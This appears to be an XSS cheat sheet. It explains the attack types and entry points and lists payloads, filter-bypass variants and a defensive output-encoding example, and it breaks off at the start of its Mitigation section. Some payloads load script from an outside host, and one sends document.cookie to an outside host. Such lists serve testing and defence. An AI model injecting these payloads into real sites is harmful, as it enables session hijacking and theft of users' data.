# XSS

XSS (Cross-Site Scripting) is a client-side code injection attack in which an attacker's script is executed in the victim's web browser.

### Impact

* **Account Hijacking**: Attackers can steal session cookies and take over the victim's session. If the victim is an administrator, this yields administrative access.
* **Credential Theft**: Credentials such as passwords entered into a cloned login page are sent to the attacker.
* **Data Leakage**: Personally identifiable information (PII) such as credit card numbers, SSNs, or any other data stored in the browser can be read.
* Redirection to malicious web pages, keylogging, malware downloads.
* Access to geolocation, webcam, microphone, and files on the system.

There are 3 types of XSS:

* Reflected (Non-persistent)
* Stored (Persistent)
* DOM-based

## Reflected (Non-Persistent)

The payload is part of the request sent to the server and is reflected back in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized properly, JS code placed in it executes when the greeting is rendered.

## Stored (Persistent)

The payload passed to the web application is stored on the server and executes whenever the stored data is rendered elsewhere.

For example, a payload could be saved as a comment on a page, and the JS code then executes every time the comments are loaded.

## DOM-based

DOM objects are manipulated by client-side script to execute malicious code. This is a more advanced attack, as the payload never reaches the server-side WAFs and executes entirely on the client side.

For example, a page that calls `document.write(document.URL)` writes the current URL, including any attacker-controlled part of it, straight into the document, where it is parsed as HTML and executed.

## Entry Points

Any user-controlled parameter such as:

* Input fields
* Host and Referer headers
* URL redirection
* URI parameters
* File upload (file name)

## Payloads

### Popular

```
<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>
```

Polyglots:

```
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
```

### Context Breaking

#### HTML Context

Case: \<tag> Searched for $input \</tag>

```
<svg onload=alert()>
</tag><svg onload=alert()>
```

#### Attribute Context

Case: \<tag attribute="$input">

```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
```

#### JavaScript Context

Case: \<script> var something = '$input'; \</script>

```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```
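Context-aware output encoding is the defence against all three context-breaking cases above. This added example (not from the original page) implements one encoder per context, applies each to the page's own breakout payloads, and checks that the encoded output adds no tags; the template strings and the `tagOpeners` helper are assumptions of the example.

```javascript
// Added example (not from the original page): context-aware output
// encoding, the defence against each "Context Breaking" case above.
// Each output context needs its own encoder; mixing them up is the bug.

// HTML body context: <tag> Searched for $input </tag>
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'/]/g, (c) => map[c]);
}

// Attribute context: <tag attribute="$input">. Encode every
// non-alphanumeric code point, so neither a quote nor a space can close
// the value and start a new attribute (" onmouseover=alert() ").
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16).toUpperCase()};`);
}

// JavaScript string context: <script>var q = '$input';</script>.
// \xHH / \uHHHH escapes (per UTF-16 code unit) keep quotes, newlines and
// "</script>" inside the string literal, so the HTML parser never sees
// a closing tag.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const cu = c.charCodeAt(0);
    return cu < 0x100 ? `\\x${cu.toString(16).padStart(2, '0')}`
                      : `\\u${cu.toString(16).padStart(4, '0')}`;
  });
}

// Assumed templates matching the three cases, each with its own encoder.
function renderHtml(input) { return `<p>Searched for ${encodeHtml(input)}</p>`; }
function renderAttr(input) { return `<input value="${encodeHtmlAttr(input)}">`; }
function renderJs(input)   { return `<script>var q = '${encodeJsString(input)}';</script>`; }

// Crude breakout check: count '<' in the output. Correctly encoded input
// can never add a tag, so the count must equal the template's own.
function tagOpeners(markup) { return (markup.match(/</g) || []).length; }

// Constructed samples: the page's own context-breaking payloads.
const samples = {
  html: '</tag><svg onload=alert()>',
  attr: '" onmouseover=alert() "',
  js:   "'-alert()-'",
};
console.log(renderHtml(samples.html)); // 2 tags: <p>, </p>
console.log(renderAttr(samples.attr)); // 1 tag:  <input>
console.log(renderJs(samples.js));     // 2 tags: <script>, </script>
```

Rendering the same samples without an encoder (for instance `'<p>Searched for ' + samples.html + '</p>'`) raises the tag count, which is exactly the breakout the payloads above rely on.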

### Bypassing

#### Without Event Handlers

```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```

#### Without Space

```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```

#### Without Slash (/)

```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```

#### Without closing angular bracket (>)

```
<svg onload=confirm()//
<svg onload=alert(1)<!--
```

#### Without alert, confirm, prompt

```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```

#### Without a Valid HTML tag

```
<x onclick=confirm()>click here
<x ondrag=confirm()>drag it
```

## Mitigation

* L
